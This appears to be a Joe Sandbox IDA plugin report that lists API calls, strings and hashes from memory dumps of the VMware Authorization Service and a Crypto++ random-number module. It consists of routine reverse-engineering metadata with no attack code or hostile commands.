                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$ApplicationCategory$CtrlDispatcherFileModuleNameServiceStartStartupmemsetstrrchr
                                                    • String ID: %s: GetModuleFileNameW Failed: %d$%s: WSCSetApplicationCategory Failed: %d$%s: WSCSetApplicationCategory succeeded: %#x$No usable WinSock DLL. error: %d.$StartServiceCtrlDispatcher error = %d$VMAuthdRunService$VMAuthdService$authd.lspCategory
                                                    • API String ID: 3578263550-3683011569
                                                    • Opcode ID: 84df3d44d01732ee9664fee41d6c9b9f8feb88bc9e9ef68c76c212761946a2bd
                                                    • Instruction ID: 2cac2741d0113c154bd12b7bd36b2d2ef88d79828f2a4a7481093e1c6563cc3c
                                                    • Opcode Fuzzy Hash: 84df3d44d01732ee9664fee41d6c9b9f8feb88bc9e9ef68c76c212761946a2bd
                                                    • Instruction Fuzzy Hash: 7471E871B412056EDB30AB709C46BAA77E9DF15348F1420A7F949FB382EB319E06C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00ED4B9A
                                                    • setsockopt.WS2_32(00000000,0000FFFF,00000004,FFFFFFFF,00000004), ref: 00ED4BC6
                                                    • WSAGetLastError.WS2_32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4BD1
                                                    • htonl.WS2_32(00000000), ref: 00ED4BF2
                                                    • htons.WS2_32(00000000), ref: 00ED4BFF
                                                    • bind.WS2_32(00000000,uE,00000010), ref: 00ED4C10
                                                    • WSAGetLastError.WS2_32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C35
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C55
                                                    • GetLastError.KERNEL32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C61
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00ED4C7D
                                                    • WSAGetLastError.WS2_32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C88
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C9F
                                                    • closesocket.WS2_32(00000000), ref: 00ED4CB0
                                                    Strings
                                                    • Call to CreateEvent failed with error %d., xrefs: 00ED4C68
                                                    • WSAEventSelect failed with error %d., xrefs: 00ED4C8F
                                                    • Call to bind failed with error %d., xrefs: 00ED4C1B, 00ED4C3C
                                                    • Call to setsockopt failed with error %d., xrefs: 00ED4BD8
                                                    • uE, xrefs: 00ED4C09, 00ED4C0E
                                                    • Call to socket failed with error %d., xrefs: 00ED4BA7
                                                    • Call to listen failed with error %d., xrefs: 00ED4C30
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EventWarning$CloseCreateHandleSelect_printfbindclosesockethtonlhtonssetsockoptsocket
                                                    • String ID: Call to CreateEvent failed with error %d.$Call to bind failed with error %d.$Call to listen failed with error %d.$Call to setsockopt failed with error %d.$Call to socket failed with error %d.$WSAEventSelect failed with error %d.$uE
                                                    • API String ID: 3009708719-1751584600
                                                    • Opcode ID: 28ce10956d62de98aeef792ca00c0b90ba69adf481e0ab977bca018c823a76b4
                                                    • Instruction ID: 12ce7b9b67e137a66bbaf076f0ed3c1b716ecbe6184d87851af21fc8726f2617
                                                    • Opcode Fuzzy Hash: 28ce10956d62de98aeef792ca00c0b90ba69adf481e0ab977bca018c823a76b4
                                                    • Instruction Fuzzy Hash: 3641D8B0A02204AFEB109F75AC46BADB7A4EF25725F141227FA24FB3D1D77049068752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(%s: Pathname too long: %s,VMAuthdPermissionsCheck,00000000,?,?,?,00ED2584,00000000,?,?,00000000,00000000,?,?), ref: 00ED338F
                                                    • Warning.VMWAREBASE(?,00000000,00000104,00000000,00000000,?,?,?,00ED2584,00000000,?,?,00000000,00000000,?,?), ref: 00ED33CE
                                                    • ImpersonateLoggedOnUser.ADVAPI32(?,00000000,?,?), ref: 00ED33E3
                                                    • GetLastError.KERNEL32 ref: 00ED33ED
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • Warning.VMWAREBASE(?,00000000,00000000,?,?), ref: 00ED3428
                                                    • ImpersonateLoggedOnUser.ADVAPI32(?,?,?,00000000,?,?), ref: 00ED344D
                                                    • GetLastError.KERNEL32(?,?,00000000,?,?), ref: 00ED3457
                                                    • Warning.VMWAREBASE(00000000,00120089,?,?,?,00000000,?,?), ref: 00ED3479
                                                    • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00ED34C6
                                                    • GetLastError.KERNEL32 ref: 00ED34D0
                                                    • Warning.VMWAREBASE(00000000,001200A0,?), ref: 00ED34F2
                                                      • Part of subcall function 00ED6EA0: RevertToSelf.ADVAPI32(00ED35D3,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED6E80
                                                    Strings
                                                    • You need execute access in order to connect with the %s. Access denied for config file: %s, xrefs: 00ED3513
                                                    • You need read access in order to connect with the %s. Access denied for config file: %s, xrefs: 00ED349A
                                                    • VMAuthdPermissionsCheck, xrefs: 00ED3385
                                                    • %s: Pathname too long: %s, xrefs: 00ED338A
                                                    • Config file not found: %s, xrefs: 00ED3404
                                                    • VMware Server Console, xrefs: 00ED3495, 00ED350E
                                                    • Invalid pathname (too long), xrefs: 00ED3394
                                                    • Failed to impersonate logged on user (error %d)., xrefs: 00ED33F4, 00ED345E, 00ED34D7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$ImpersonateLoggedUser$RevertSelf_printf
                                                    • String ID: %s: Pathname too long: %s$Config file not found: %s$Failed to impersonate logged on user (error %d).$Invalid pathname (too long)$VMAuthdPermissionsCheck$VMware Server Console$You need execute access in order to connect with the %s. Access denied for config file: %s$You need read access in order to connect with the %s. Access denied for config file: %s
                                                    • API String ID: 3502866025-2643214048
                                                    • Opcode ID: 2cf85f0a67b92fd27bf20cc9d7ac127b964ba1fd3f19f531a99d3a3450a1fbeb
                                                    • Instruction ID: d16cfa5de6aa8f4f992835dc6804f93e500434ee8c9712c07b3270d1802b9e68
                                                    • Opcode Fuzzy Hash: 2cf85f0a67b92fd27bf20cc9d7ac127b964ba1fd3f19f531a99d3a3450a1fbeb
                                                    • Instruction Fuzzy Hash: 88412C71A463107AD6215B747C06FAABB58CF52B19F04229BFD24763C2E6528B0741E7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED1FC5
                                                    • strrchr.VCRUNTIME140(00000000,0000005C), ref: 00ED1FD6
                                                    • Warning.VMWAREBASE(?,?,%s%c..%c%s,00000000,0000005C,0000005C,vmware-vmx.exe), ref: 00ED1FF9
                                                    • Warning.VMWAREBASE(?,00000004,?,?,%s%c..%c%s,00000000,0000005C,0000005C,vmware-vmx.exe), ref: 00ED2001
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED200E
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED2022
                                                    • Warning.VMWAREBASE(vmware-vmx-stats.exe), ref: 00ED204A
                                                    • Warning.VMWAREBASE(00000000,vmware-vmx-stats.exe), ref: 00ED2052
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED205F
                                                    • Warning.VMWAREBASE(vmware-vmx-stats.exe), ref: 00ED2066
                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00ED207A
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED2081
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$strncpystrrchr
                                                    • String ID: %s%c..%c%s$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\vmauthd.c$vmware-vmx-debug.exe$vmware-vmx-stats.exe$vmware-vmx.exe
                                                    • API String ID: 1596469099-3787913377
                                                    • Opcode ID: 538332a67b4f14d848f8fe5683dab8f1d83aa02758387f645df1a72c42ddf25d
                                                    • Instruction ID: 1cde52fe4ac365d032dc8e7ea7da993a0cc2895962eee450181ed0d2effe51f2
                                                    • Opcode Fuzzy Hash: 538332a67b4f14d848f8fe5683dab8f1d83aa02758387f645df1a72c42ddf25d
                                                    • Instruction Fuzzy Hash: F321FBA1544340AFEB2126756DC6B6F3B58CF95755F08202BFB147A383E76A8A078372
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • strstr.VCRUNTIME140(?,.exe,00000001), ref: 00ED3FAF
                                                    • Warning.VMWAREBASE(?,00000104,%s.exe,?), ref: 00ED3FCD
                                                    • Warning.VMWAREBASE(?), ref: 00ED3FDC
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED3FF4
                                                    • Warning.VMWAREBASE(?,VMAuthdService,VMware Authorization Service,Authorization and authentication service for starting and accessing virtual machines,00000000,00000000,%s,00000000), ref: 00ED4014
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED4042
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED404B
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4057
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$_printffree$strstr
                                                    • String ID: %s$%s.exe$.exe$Authorization and authentication service for starting and accessing virtual machines$Could not find path to service %s.$Successfully registered %s.$Successfully unregistered %s.$VMAuthdService$VMware Authorization Service
                                                    • API String ID: 4064233335-4157764946
                                                    • Opcode ID: 66022724001ee702ef18de900077c0c7e587a6846fafd1ff0f0fb8c0bcf59cca
                                                    • Instruction ID: 3bda02d4959b264b4065f6ad371040db5cdd269c511f9d215e798a56abd74989
                                                    • Opcode Fuzzy Hash: 66022724001ee702ef18de900077c0c7e587a6846fafd1ff0f0fb8c0bcf59cca
                                                    • Instruction Fuzzy Hash: DF21D871A4131977CB206B609C06EDE37A4CF61B45F102197FA0872381DBB55F878EE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,69F2C272,?,00000000,6CF54435), ref: 6CF61955
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,6CF9D77D,000000FF,?,6CF61FA0), ref: 6CF6195B
                                                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CF6196F
                                                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CF61980
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,6CF9D77D,000000FF), ref: 6CF619A5
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CF61A22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: AcquireContextCrypt$ErrorLast$___std_exception_copy
                                                    • String ID: CryptAcquireContext$Crypto++ RNG
                                                    • API String ID: 616088579-1159690233
                                                    • Opcode ID: d17227e22834550a59e6743765f2546566082b438a84febae6be856012391bde
                                                    • Instruction ID: 8c6a319b3e6b87ceb3526524161ed84d1f2c9a1bc3cdd5c3a9df003f9a05edc7
                                                    • Opcode Fuzzy Hash: d17227e22834550a59e6743765f2546566082b438a84febae6be856012391bde
                                                    • Instruction Fuzzy Hash: D041B572A14609ABDB10DF95CC41FDAF7FCEB09714F10462AF512E7A80EBB5A504CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(00000002,?,0000001E,vmware-vmx-stats.exe,?,?,?,?,?,?,?,?,00ED225B), ref: 00ED24AE
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: %s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s$: SSL Required$NFCSSL supported/t$ServerDaemonProtocol:SOAP$VMware$["$vmware-vmx-stats.exe
                                                    • API String ID: 2415109466-128753137
                                                    • Opcode ID: fbd433447adee4564bd3cc7d1f49de4a0956453b8957bed4bb281caf00312146
                                                    • Instruction ID: a877600fb87cb7e3acc9ebfedd693343ab37089c4b759591ade3a4ceeb14f59d
                                                    • Opcode Fuzzy Hash: fbd433447adee4564bd3cc7d1f49de4a0956453b8957bed4bb281caf00312146
                                                    • Instruction Fuzzy Hash: A4017171780348AFEB18D7648D93FBA73E8D745700F08207BB901FB381D961AE469626
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ED8F8C
                                                    • memset.VCRUNTIME140(?,00000000,00000003), ref: 00ED8FB2
                                                    • memset.VCRUNTIME140(?,00000000,00000050), ref: 00ED903C
                                                    • IsDebuggerPresent.KERNEL32 ref: 00ED9058
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00ED9078
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00ED9082
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 1045392073-0
                                                    • Opcode ID: 5fe6468efe2f4134cf5b645979f4b99768e2b1f23e48cdd179119280de51ef2d
                                                    • Instruction ID: ed58fef8c6f86c507cd4a3125876a0dbfed3a08aee45e750dea826403c3bdf94
                                                    • Opcode Fuzzy Hash: 5fe6468efe2f4134cf5b645979f4b99768e2b1f23e48cdd179119280de51ef2d
                                                    • Instruction Fuzzy Hash: B23107B5D022189FDB20DFA5DD897CCBBF8EF08304F1041AAE40DAB250EB705A898F05
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,6CF9722F,00000002,00000000,?,?,?,6CF9722F,?,00000000), ref: 6CF96FAA
                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,6CF9722F,00000002,00000000,?,?,?,6CF9722F,?,00000000), ref: 6CF96FD3
                                                    • GetACP.KERNEL32(?,?,6CF9722F,?,00000000), ref: 6CF96FE8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: ACP$OCP
                                                    • API String ID: 2299586839-711371036
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED2468
                                                      • Part of subcall function 00ED26C0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00ED2829,00EDA850,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED26C9
                                                      • Part of subcall function 00ED26C0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00EDA850,00000000,?,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED26E4
                                                    Strings
                                                    • VMware, xrefs: 00ED245E
                                                    • %s Authentication Daemon Version %u.%u for %s %s, xrefs: 00ED2463
                                                    • VMware Workstation, xrefs: 00ED2455
                                                    • 17.0.0 build-20800274, xrefs: 00ED2450
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    Similarity
                                                    • API ID: __acrt_iob_func__stdio_common_vfprintf_printf
                                                    • String ID: %s Authentication Daemon Version %u.%u for %s %s$17.0.0 build-20800274$VMware$VMware Workstation
                                                    • API String ID: 1378652321-2909783590
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(69F2C272,7508FC30,?), ref: 6CF61AB8
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF61DF0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: ContextCryptErrorLastRelease
                                                    • String ID: operation failed with error $OS_Rng:
                                                    • API String ID: 3299239745-700108173
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CryptGenRandom.ADVAPI32(6CF54435,00000000,00000001), ref: 6CF61FC8
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6CF61FEB
                                                      • Part of subcall function 6CF77E22: EnterCriticalSection.KERNEL32(6CFDB368,?,00000000,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77E2D
                                                      • Part of subcall function 6CF77E22: LeaveCriticalSection.KERNEL32(6CFDB368,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77E6A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: CriticalCryptSection$ContextEnterLeaveRandomRelease
                                                    • String ID: CryptGenRandom
                                                    • API String ID: 1877079010-3616286655
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0BF
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0F5
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96BEC
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96C36
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96CFC
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: InfoLocale$ErrorLast_free
                                                    • String ID:
                                                    • API String ID: 3140898709-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CryptGenRandom.ADVAPI32(?,?), ref: 6CF61E92
                                                      • Part of subcall function 6CF61A70: GetLastError.KERNEL32(69F2C272,7508FC30,?), ref: 6CF61AB8
                                                      • Part of subcall function 6CF78F50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,6CF766CB,?,6CFB6AC8,00000000,?,00000000,?,?,?), ref: 6CF78FB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: CryptErrorExceptionLastRaiseRandom
                                                    • String ID: CryptGenRandom
                                                    • API String ID: 1262793447-3616286655
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00ED8DB5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0BF
                                                      • Part of subcall function 6CF8B05D: _free.LIBCMT ref: 6CF8B0F5
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6CF96E3F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLast_free$InfoLocale
                                                    • String ID:
                                                    • API String ID: 2003897158-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • EnumSystemLocalesW.KERNEL32(6CF96B98,00000001,00000000,?,-00000050,?,6CF971C6,00000000,?,?,?,00000055,?), ref: 6CF96AE4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
